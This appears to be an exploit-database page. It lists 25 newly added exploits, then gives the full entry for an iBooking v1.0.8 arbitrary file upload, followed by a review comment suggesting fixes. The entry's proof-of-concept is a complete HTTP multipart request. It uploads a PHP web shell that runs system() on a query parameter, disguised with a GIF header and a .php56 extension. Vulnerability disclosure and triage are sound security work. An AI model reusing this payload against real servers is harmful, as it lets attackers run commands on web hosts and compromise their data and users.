
25 changes to exploits/shellcodes/ghdb

ReQlogic v11.3 - Reflected Cross-Site Scripting (XSS)
Tapo C310 RTSP server v1.3.0 - Unauthorised Video Stream Access
ZKTeco ZEM/ZMM 8.88 - Missing Authentication
Hashicorp Consul v1.0 - Remote Command Execution (RCE)
X-Skipper-Proxy v0.13.237 - Server Side Request Forgery (SSRF)
OPSWAT Metadefender Core - Privilege Escalation
Pega Platform 8.1.0 - Remote Code Execution (RCE)
Beauty-salon v1.0 - Remote Code Execution (RCE)
BoxBilling<=4.22.1.5 - Remote Code Execution (RCE)
iBooking v1.0.8 - Arbitrary File Upload
Jetpack 11.4 - Cross Site Scripting (XSS)
Moodle LMS 4.0 - Cross-Site Scripting (XSS)
Online shopping system advanced 1.0 - Multiple Vulnerabilities
rukovoditel 3.2.1 - Cross-Site Scripting (XSS)
Senayan Library Management System v9.5.0 - SQL Injection
Social-Share-Buttons v2.2.3 - SQL Injection
Subrion CMS 4.2.1 - Stored Cross-Site Scripting (XSS)
YouPHPTube<= 7.8 - Multiple Vulnerabilities
Label Studio 1.5.0 - Authenticated Server Side Request Forgery (SSRF)
SuperMailer v11.20 - Buffer overflow DoS
Tunnel Interface Driver - Denial of Service
VMware Workstation 15 Pro - Denial of Service
HDD Health 4.2.0.112 - 'HDDHealth' Unquoted Service Path
SugarSync 4.1.3 - 'SugarSync Service' Unquoted Service Path
41 lines
No EOL
1.5 KiB
Text
# Exploit Title: iBooking v1.0.8 - Arbitrary File Upload
# Exploit Author: d1z1n370/oPty
# Date: 01/11/2022
# Vendor Homepage: https://codecanyon.net/item/ibooking-laravel-booking-system/30362088
# Tested on: Linux
# Version: 1.0.8

# Exploit Description:
The application is prone to an arbitrary file-upload because it fails to adequately sanitize user-supplied input. An attacker can exploit these issues to upload arbitrary files in the context of the web server process and execute commands.


# PoC request

POST https://localhost/dashboard/upload-new-media HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/108.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://localhost/dashboard/settings
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------115904534120015298741783774062
Content-Length: 449
Connection: close
Cookie: PHPSESSID=a36f66fa4a5751d4a15db458d573139c

-----------------------------115904534120015298741783774062
Content-Disposition: form-data; name="_token"

kVTpp66poSLeJVYgb1sM6F7KIzQV2hbVfQLaUEEW
-----------------------------115904534120015298741783774062
Content-Disposition: form-data; name="is_modal"

1
-----------------------------115904534120015298741783774062
Content-Disposition: form-data; name="file"; filename="upload.php56"
Content-Type: image/gif

GIF89a;
<?php system($_GET['a']); phpinfo(); ?>
-----------------------------115904534120015298741783774062--
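
Review bot: The "# Exploit Description" paragraph never says which server-side check is missing, and the only evidence for it is the last multipart part of the PoC request, where filename="upload.php56" is sent with Content-Type: image/gif and a GIF89a; prefix. Suggest stating in the description that the "file" field is accepted with a non-image extension despite the declared image type, and whether a logged-in dashboard session is required (the request carries a PHPSESSID cookie and a "_token" field), so that readers triaging this entry can see that the fix is a server-side extension allow-list with uploads stored outside the web root rather than a content-type check. "Tested on: Linux" should also name the web server and PHP setup, since the description claims command execution but the header gives nothing a reader could use to judge whether their deployment is affected. Minor points in the same header: "these issues" should read "this issue", the date 01/11/2022 is ambiguous between day-first and month-first, and the User-Agent mixes rv:68.0 with Firefox/108.0.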